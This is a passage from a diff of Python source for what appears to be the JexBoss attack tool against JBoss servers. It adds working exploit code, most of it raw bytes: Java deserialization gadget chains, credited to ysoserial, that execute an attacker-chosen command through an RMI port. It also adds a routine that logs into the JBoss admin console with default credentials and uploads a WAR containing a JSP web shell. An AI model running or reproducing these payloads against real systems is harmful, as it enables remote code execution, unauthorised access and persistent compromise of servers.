+\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\ +\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72\ +\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38\x02\x00\x03\x5B\x00\x05\x69\ +\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\ +\x74\x3B\x4C\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\ +\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\ +\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\ +\x70\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\ +\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\ +\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\ +\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\ +\x00\x74\x00\x09\x67\x65\x74\x4D\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x25\x00\x00\x00\x02\x76\ +\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\xA0\xF0\xA4\x38\x7A\ +\x3B\xB3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7E\x00\x25\x73\x71\x00\x7E\x00\x1D\x75\x71\x00\ +\x7E\x00\x22\x00\x00\x00\x02\x70\x75\x71\x00\x7E\x00\x22\x00\x00\x00\x00\x74\x00\x06\x69\x6E\x76\ +\x6F\x6B\x65\x75\x71\x00\x7E\x00\x25\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\ +\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\ +\x71\x00\x7E\x00\x22\x73\x71\x00\x7E\x00\x1D\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\ +\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x70\x78\x70\ +\x00\x00\x00\x01\x74\x00") + # if running in python 3 + if version_info[0] >= 3: + payload += (bytes(chr(len(cmd)), 'utf-8')) + payload += (bytes(cmd, 'utf-8')) + else: + payload += (chr(len(cmd))) + payload += (cmd) + payload += (b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x25\x00\x00\x00\x01\x71\x00\ +\x7E\x00\x2A\x73\x71\x00\x7E\x00\x19\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\ +\x6E\x74\x65\x67\x65\x72\x12\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\ +\x65\x70\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\ +\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7E\x00\x09\x3F\x40\ +\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78\x78\x76\x72\x00\x12\ +\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\ +\x00\x00\x00\x00\x00\x70\x78\x70") + + # Interact to confirms that this is an RMI port + # This interact is no need... only for fun + + # 1) send protocol hello (JRMI..K) + s.send(b"\x4A\x52\x4D\x49\x00\x02\x4B") + + # 2) receive data (4e 00 XX + src_IP + 00 00 + int_src_Port) 19 bytes + s.recv(1024) + + # 3) send some data + a little serialized object (18 bytes) + s.send(b"\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\ +\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ +\x00\x00\x00\x00\x00\x00\x02\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x06\x6a\x6d\x78\x72\x6d\x69") + + # 4) receive a RMIServerImpStub serialized, containing the port to connect in jrmi (42 bytes) + msg = s.recv(1024) + + # take rmi port platform from received bytes + port_rmi_platform = int(base64.b16encode(msg[-26:-24]), 16) + + s.send("\x52") + s.recv(1024) + s.send(b"\x54\x7d\x14\x23\xc5\x00\x00\x01\x5a\x6d\x61\xc2\x91\x3b\xc8") + + # 5) close this connection + s.close() + + # Connect to send exploit + #----------------------------------------- + + # 6) open a new connect, to a port + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(7) + s.connect((host_rmi,port_rmi)) + + # 7) send header + s.send(b"\x4A\x52\x4D\x49\x00\x02\x4B") + + # 8) receive data + s.recv(1024) + + # 9) sendo some data + s.send(b"\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00") + + # 10) send payload + s.send(payload) + + s.close() + + except socket.error as err: + jexboss.print_and_flush(RED + "\n * [ERROR]: %s (%s:%s).\n" % (err,host_rmi,port_rmi)+ ENDC) + return 505 + + return 200 + + +def exploit_admin_console(url, jboss_login): + """ + Exploits admin-console + tested and works in JBoss 5 and 6 + :param url: The URL to exploit + :return: The HTTP status code + """ + # Use default password for Jboss 5 and 6 + username = jboss_login.split(":")[0] + password = jboss_login.split(":")[1] + headers = { + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent()} + + r = gl_http_pool.request('GET', url+"/admin-console/login.seam", headers=headers) + + if r.getheader('set-cookie') is not None: + headers['Cookie'] = r.getheader('set-cookie') + + state = get_viewstate_value(str(r.data)) + #payload = ("login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login" + # "&javax.faces.ViewState=%s" % (username, password, state)) + if state is None: return 505 + payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state) + headers['Content-Type'] = "application/x-www-form-urlencoded" + if jboss_login == "admin:admin": + jexboss.print_and_flush(GREEN + "\n * Info: Trying to perform authentication with default credentials..." +ENDC) + else: + jexboss.print_and_flush(GREEN + "\n * Info: Trying to perform authentication with credentials: %s" %jboss_login+ ENDC ) + r = gl_http_pool.request('POST', url+"/admin-console/login.seam", body=payload, headers=headers, redirect=False) + state = get_viewstate_value(str(r.data)) + if r.status == 302: + jexboss.print_and_flush(GREEN + " * Info: Successfully logged in! Wait..." + ENDC) + location = r.getheader('Location') + conversation_id = location.split('=')[1] + r = gl_http_pool.request('GET', location, headers=headers) + if state == None: + sleep(7) + r = gl_http_pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR" + "%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers) + conversation_id = str(int(conversation_id)+1) + r = gl_http_pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType" + "Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId=" + + conversation_id, headers=headers) + state = get_viewstate_value(str(r.data)) + + headers['Content-Type'] = "multipart/form-data; boundary=---------------------------551367293438156646377323759" + + payload = ("\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00\x05\xBC\x5E\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x09\x00\x04\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x03\x00\x50\x4B" + "\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00" + "\x05\xBC\x5E\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x4D\x45\x54\x41" + "\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54\x2E\x4D\x46\xF3\x4D\xCC\xCB\x4C\x4B\x2D\x2E" + "\xD1\x0D\x4B\x2D\x2A\xCE\xCC\xCF\xB3\x52\x30\xD4\x33\xE0\xE5\x72\x2E\x4A\x4D\x2C\x49\x4D\xD1\x75" + "\xAA\x04\x09\x58\xE8\x19\xC4\x9B\x9B\x2B\x68\xF8\x17\x25\x26\xE7\xA4\x2A\x38\xE7\x17\x15\xE4\x17" + "\x25\x96\x00\x95\x6B\xF2\x72\xF1\x72\x01\x00\x50\x4B\x07\x08\x05\xA0\x0E\xBC\x43\x00\x00\x00\x44" + "\x00\x00\x00\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00\xEF\xBB\x5E\x49\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x0A\x00\x00\x00\x6A\x65\x78\x77\x73\x34\x2E\x6A\x73\x70\x95\x55\xDB\x6E\xDB" + "\x38\x10\x7D\xDF\xAF\x60\x08\x04\x10\x1B\x5B\x4E\x16\xFB\xD0\x46\x51\xB0\xD9\x6E\x82\x74\x51\x6C" + "\x83\x5C\xB0\x05\x82\xA0\x90\xA8\xB1\xC5\x84\x26\x59\x92\xB2\x1D\xB8\xFA\xF7\x0E\x29\x5F\xE3\x20" + "\xE8\xBE\x08\xE4\x70\x66\x78\xE6\xCC\x19\xEA\x64\xFF\x4F\x62\x8A\x11\x10\x31\x36\xDA\xFA\x9C\x3E" + "\x16\x93\x22\x95\x85\x1A\xA5\xEF\x7A\x71\xDD\x78\x21\x97\x6B\xA1\x97\x2B\x05\x3E\x7D\x47\x63\xE8" + "\xB9\xE2\xBA\x12\x6A\x94\xD3\xBB\xDB\x8B\xFE\x7B\xBA\x7F\x4A\x4E\x8C\x05\xFC\xEE\x13\x2E\x0B\xE7" + "\x88\x9D\x10\x98\x79\x50\x95\x23\xB7\xB5\x85\xA2\x9A\x7F\x52\xA6\xF1\x37\x1E\xD7\x63\x22\x5C\xF6" + "\xA5\xF1\xEB\xBD\x76\x99\x9D\x24\xDB\x1E\xBD\x17\x1E\x6C\xEE\x6B\xE1\x52\xE1\x72\x8C\x8E\x4B\xED" + "\x72\x0C\x6C\x4D\x53\x4A\xC1\xC9\x44\x8B\x8A\xD8\x46\x25\x6C\xFE\x57\x33\x1C\x82\x85\xEA\x1A\xEF" + "\x05\x4B\x84\xCA\x55\x23\x65\xB6\x34\xFF\x67\x85\x47\xB3\x6E\x7C\x67\xF7\xF6\x79\x1E\x7C\x60\x4A" + "\xB6\x23\x93\x60\xDA\x40\xB5\xB0\x2E\x70\x30\x96\xC5\x14\x1B\x61\x5D\xE6\x18\xB6\x89\x7E\x61\x5E" + "\x80\xC6\x38\x5E\x17\x96\x94\xF7\x0F\x31\x38\x6C\xEE\xDF\x1F\x7D\xF8\xFD\x21\x13\xCA\x13\x99\x4D" + "\x6B\x21\x21\x49\x64\x2E\x54\x1A\xA8\x4B\xCA\xDE\x61\xAF\x4C\x25\xA8\x91\xAF\x19\x3B\x3D\x64\x73" + "\xBC\x38\x9D\x86\xAC\xF1\x4C\x46\x24\xE9\x50\x36\xAE\x4E\x58\xD6\xB6\xBC\xF0\xBC\x4E\xCE\x67\x1C" + "\x8C\x17\x5A\x11\x60\xF3\xB6\x6D\x11\x0C\xF6\x8C\xB8\xBA\x2B\x5B\x0C\x13\x0B\xDF\x1B\x70\x3E\x1D" + "\x81\xBF\x2A\x6C\x31\x86\x00\x93\x1A\x63\x28\xDB\x8B\x4E\x6C\x8E\xDE\x6F\x78\x65\x2D\x48\x87\x4A" + "\xDA\x4A\x75\xD9\xD1\x44\xBF\xF6\xFF\x39\xFF\x1A\x32\x91\xD7\x52\xBD\xF0\xCA\x5A\x4C\xE2\x6A\xB2" + "\xF2\xB6\xE0\x8C\x56\x0E\x52\x07\xFE\xA3\x56\xA8\x25\x7F\xFB\x6C\x20\xA1\x1E\x85\x35\xA8\xFD\x58" + "\x62\xD0\x8B\x4E\x97\xB6\x2B\x6D\x51\xA9\xAC\x79\x1E\x9B\xF1\x77\x81\x4C\xB1\xD4\xEB\xEE\x00\x97" + "\xCE\x48\xE1\x13\x7A\x4C\xD9\xFD\xE1\xC3\x01\xAD\x53\xA9\x47\x94\x21\xDD\x46\x16\x1C\xCE\xA4\x4C" + "\x28\xA1\x3D\xDA\xC7\x3B\xA2\x3C\x5E\x2D\x50\xE9\x3E\xAF\x81\x3F\xF5\x1B\x53\xE1\x0D\x8E\xB2\x7C" + "\xC1\xDA\xA5\xF7\xE6\xEE\xFA\x33\xE2\x56\xC0\x63\x0B\x10\xC9\x8E\x91\x05\x6C\x68\x49\x68\x8D\x47" + "\xC7\x83\xC1\x14\x4A\x57\x83\x94\xE9\x23\xCC\x4A\xED\x5C\x98\xB9\xC1\xA3\x33\xDF\x26\x60\x1D\x06" + "\xA4\x7E\xE6\x11\xA5\x36\xA0\xD6\x59\xB0\xE3\x3C\x90\x74\xDD\x01\xBC\xB2\x78\x6C\xFD\x73\x42\xEF" + "\x1C\xD8\xFE\xD9\x08\x89\xA3\xBD\x57\xD0\x5F\x6A\x87\xC9\x0E\xE8\x49\x9F\x1E\x6C\x1C\x5F\xC3\x58" + "\x7B\x38\xAB\x2A\x9B\xA0\x52\xB1\xF0\xBD\x80\xF2\x22\x48\x92\xC6\x6A\xBF\xD1\x03\x24\x96\xA5\x30" + "\x13\xCE\x3B\x74\x9A\x5F\x21\xA9\x7E\x31\x55\xD3\xA8\xE9\x0D\xCB\x76\x54\x36\x4D\xB9\xD4\x0E\xBB" + "\x91\x85\x66\xFD\xEA\xC8\xF1\x80\x6C\xC3\x8C\xB7\xB2\x55\x97\x27\x79\x69\xE3\xA0\x7C\x16\x0A\xD6" + "\xBD\x25\xD8\xDB\xA3\x87\x58\x81\x9C\xA4\x58\x60\x21\x5D\x42\xFF\xA0\xAC\x1B\x1F\x13\x20\x26\xF4" + "\x5F\xBC\x6F\xC9\x2E\xB9\x92\x50\xA0\x9C\xBB\x76\xEE\x05\x51\xAE\xF4\xED\xEA\x54\xA8\x0A\x66\x5F" + "\x86\x09\x15\x55\x50\x75\xFF\xE8\xC7\x8F\x2D\xAB\xE1\x5A\x0D\xC5\xA8\x3B\x63\xF3\x5D\xCC\x98\xEE" + "\xB5\xD1\x5C\xA1\x91\x2A\xA1\x17\x05\x32\x5D\x11\xAF\x49\xA4\x8D\x0C\xB5\x25\x2B\x79\x65\x6D\x10" + "\x23\x76\x98\x03\xBE\xB1\x26\x2B\xB5\x46\xC4\x8A\x28\x31\xCB\xBD\x6D\x20\x16\x7B\xF3\xEC\x3C\x8C" + "\xE3\xB4\xAE\xA4\x30\xC4\xA4\xA8\x11\x83\xE3\xEB\xB5\x45\x09\x2D\xE9\x18\x04\x3A\x42\xF8\x10\xB7" + "\xB0\x18\xC2\x75\x4D\xA8\x43\x1B\xF5\x90\x2F\xAB\xBA\xD1\xFC\x09\x3C\x71\x3C\x36\xAF\xDB\x85\x90" + "\x05\xE9\x79\x24\x7D\x7B\xBC\x7A\x9F\x70\x7A\x47\x60\x53\xBC\xDE\x01\x6E\x36\xFC\x8F\xA3\x7F\x27" + "\x34\x84\x11\x1F\x09\x3A\x28\x85\x1A\x94\x85\xAB\x69\xF7\xBE\x44\x23\x1F\x57\x28\x39\x40\x93\xC9" + "\xAF\x1B\xE5\xC5\x18\xA2\x5C\xBB\x65\x12\xF4\x08\x1C\x33\xB3\x2C\x6A\x08\xFF\x27\x66\xA7\x01\x3D" + "\x17\x9B\xB2\xF9\x36\x07\x25\xA5\xCE\x17\xD6\x27\xEB\x48\xB7\xDB\xBB\x9E\x79\x33\xB2\xC3\xB9\x2C" + "\xE2\x2D\x84\x91\xB6\xA8\xDC\xFB\x87\xF9\x46\xA9\xF8\xD8\x70\xDA\x73\x75\xBB\x4C\xF6\x56\x92\x25" + "\x1B\x64\xF0\x91\xD0\x83\x50\x74\xFB\x7F\xC6\x69\x97\x99\xF5\x38\x55\xDB\xD3\xB4\xF8\x1B\x55\xEB" + "\x87\x79\x53\xAE\x15\xCB\x5E\xFA\xFF\x82\xC6\xEF\xD4\x93\xD2\x53\x7C\x13\xF5\x78\x5C\xA8\x2A\xCE" + "\xD9\xFE\xE9\x6F\x3F\x01\x50\x4B\x07\x08\x26\x77\xF3\x5E\xE3\x03\x00\x00\x99\x08\x00\x00\x50\x4B" + "\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x05\xBC\x5E\x49\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00" + "\x00\x00\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x45\x54\x41" + "\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x50\x4B\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x05\xBC\x5E" + "\x49\x05\xA0\x0E\xBC\x43\x00\x00\x00\x44\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x3D\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54" + "\x2E\x4D\x46\x50\x4B\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\xEF\xBB\x5E\x49\x26\x77\xF3\x5E\xE3" + "\x03\x00\x00\x99\x08\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC2\x00\x00" + "\x00\x6A\x65\x78\x77\x73\x34\x2E\x6A\x73\x70\x50\x4B\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00\xB5" + "\x00\x00\x00\xDD\x04\x00\x00\x00\x00") + + data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload) + try: + r = gl_http_pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers,body=data) + if r.status != 302: + data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload) + r = gl_http_pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data) + except: + sleep(1) + + return get_successfully(url, "/jexws4/jexws4.jsp") + + else: + jexboss.print_and_flush(RED + "\n * Failed authentication with username and password: %s.\n" + " Please try again with another login and password!\n" %jboss_login + ENDC) + sleep(4) + return 404 + + +def generate_commons_collections40_payload(cmd): + # org.apache.commons:commons-collections4:4.0 (thanks ysoserial) + + payload_commons_collection = (b"\xAC\xED\x00\x05\x73\x72\x00\x17\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x50\x72\x69\x6F\x72\ +\x69\x74\x79\x51\x75\x65\x75\x65\x94\xDA\x30\xB4\xFB\x3F\x82\xB1\x03\x00\x02\x49\x00\x04\x73\x69\ +\x7A\x65\x4C\x00\x0A\x63\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x74\x00\x16\x4C\x6A\x61\x76\x61\x2F\ +\x75\x74\x69\x6C\x2F\x43\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x3B\x78\x70\x00\x00\x00\x02\x73\x72\ +\x00\x42\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\ +\x6C\x65\x63\x74\x69\x6F\x6E\x73\x34\x2E\x63\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x73\x2E\x54\x72\ +\x61\x6E\x73\x66\x6F\x72\x6D\x69\x6E\x67\x43\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x2F\xF9\x84\xF0\ +\x2B\xB1\x08\xCC\x02\x00\x02\x4C\x00\x09\x64\x65\x63\x6F\x72\x61\x74\x65\x64\x71\x00\x7E\x00\x01\ +\x4C\x00\x0B\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x74\x00\x2D\x4C\x6F\x72\x67\x2F\x61\x70\ +\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\ +\x34\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x40\x6F\x72\x67\x2E\ +\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\ +\x6E\x73\x34\x2E\x63\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x73\x2E\x43\x6F\x6D\x70\x61\x72\x61\x62\ +\x6C\x65\x43\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\xFB\xF4\x99\x25\xB8\x6E\xB1\x37\x02\x00\x00\x78\ +\x70\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\ +\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x34\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\ +\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\ +\x02\x00\x01\x5B\x00\x0D\x69\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2E\x5B\x4C\ +\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\ +\x63\x74\x69\x6F\x6E\x73\x34\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\ +\x00\x2E\x5B\x4C\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\ +\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x34\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\ +\x39\x81\x3A\xFB\x08\xDA\x3F\xA5\x02\x00\x00\x78\x70\x00\x00\x00\x02\x73\x72\x00\x3C\x6F\x72\x67\ +\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\ +\x6F\x6E\x73\x34\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\ +\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\ +\x43\x6F\x6E\x73\x74\x61\x6E\x74\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\ +\x6A\x65\x63\x74\x3B\x78\x70\x76\x72\x00\x37\x63\x6F\x6D\x2E\x73\x75\x6E\x2E\x6F\x72\x67\x2E\x61\ +\x70\x61\x63\x68\x65\x2E\x78\x61\x6C\x61\x6E\x2E\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x78\x73\x6C\ +\x74\x63\x2E\x74\x72\x61\x78\x2E\x54\x72\x41\x58\x46\x69\x6C\x74\x65\x72\x00\x00\x00\x00\x00\x00\ +\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3F\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\ +\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x34\x2E\x66\x75\x6E\x63\x74\ +\x6F\x72\x73\x2E\x49\x6E\x73\x74\x61\x6E\x74\x69\x61\x74\x65\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\ +\x65\x72\x34\x8B\xF4\x7F\xA4\x86\xD0\x3B\x02\x00\x02\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\ +\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x5B\x00\x0B\x69\x50\ +\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\ +\x43\x6C\x61\x73\x73\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\ +\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x01\ +\x73\x72\x00\x3A\x63\x6F\x6D\x2E\x73\x75\x6E\x2E\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x78\ +\x61\x6C\x61\x6E\x2E\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x78\x73\x6C\x74\x63\x2E\x74\x72\x61\x78\ +\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x49\x6D\x70\x6C\x09\x57\x4F\xC1\x6E\xAC\xAB\x33\x03\x00\ +\x06\x49\x00\x0D\x5F\x69\x6E\x64\x65\x6E\x74\x4E\x75\x6D\x62\x65\x72\x49\x00\x0E\x5F\x74\x72\x61\ +\x6E\x73\x6C\x65\x74\x49\x6E\x64\x65\x78\x5B\x00\x0A\x5F\x62\x79\x74\x65\x63\x6F\x64\x65\x73\x74\ +\x00\x03\x5B\x5B\x42\x5B\x00\x06\x5F\x63\x6C\x61\x73\x73\x71\x00\x7E\x00\x14\x4C\x00\x05\x5F\x6E\ +\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\ +\x4C\x00\x11\x5F\x6F\x75\x74\x70\x75\x74\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4C\ +\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x3B\x78\x70\x00\ +\x00\x00\x00\xFF\xFF\xFF\xFF\x75\x72\x00\x03\x5B\x5B\x42\x4B\xFD\x19\x15\x67\x67\xDB\x37\x02\x00\ +\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5B\x42\xAC\xF3\x17\xF8\x06\x08\x54\xE0\x02\x00\x00\ +\x78\x70\x00\x00\x06\x8C\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x38\x0A\x00\x03\x00\x22\x07\x00\x36\ +\x07\x00\x25\x07\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\x73\x69\x6F\x6E\x55\x49\ +\x44\x01\x00\x01\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\x6C\x75\x65\x05\xAD\x20\ +\x93\xF3\x91\xDD\xEF\x3E\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\x28\x29\x56\x01\x00\x04\ +\x43\x6F\x64\x65\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\x61\x62\x6C\x65\x01\x00\ +\x12\x4C\x6F\x63\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\x65\x01\x00\x04\x74\x68\ +\x69\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\ +\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\x61\x73\x73\x65\x73\x01\x00\x35\x4C\x79\x73\x6F\x73\x65\ +\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\ +\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x3B\x01\ +\x00\x09\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\x01\x00\x72\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\ +\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\ +\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\ 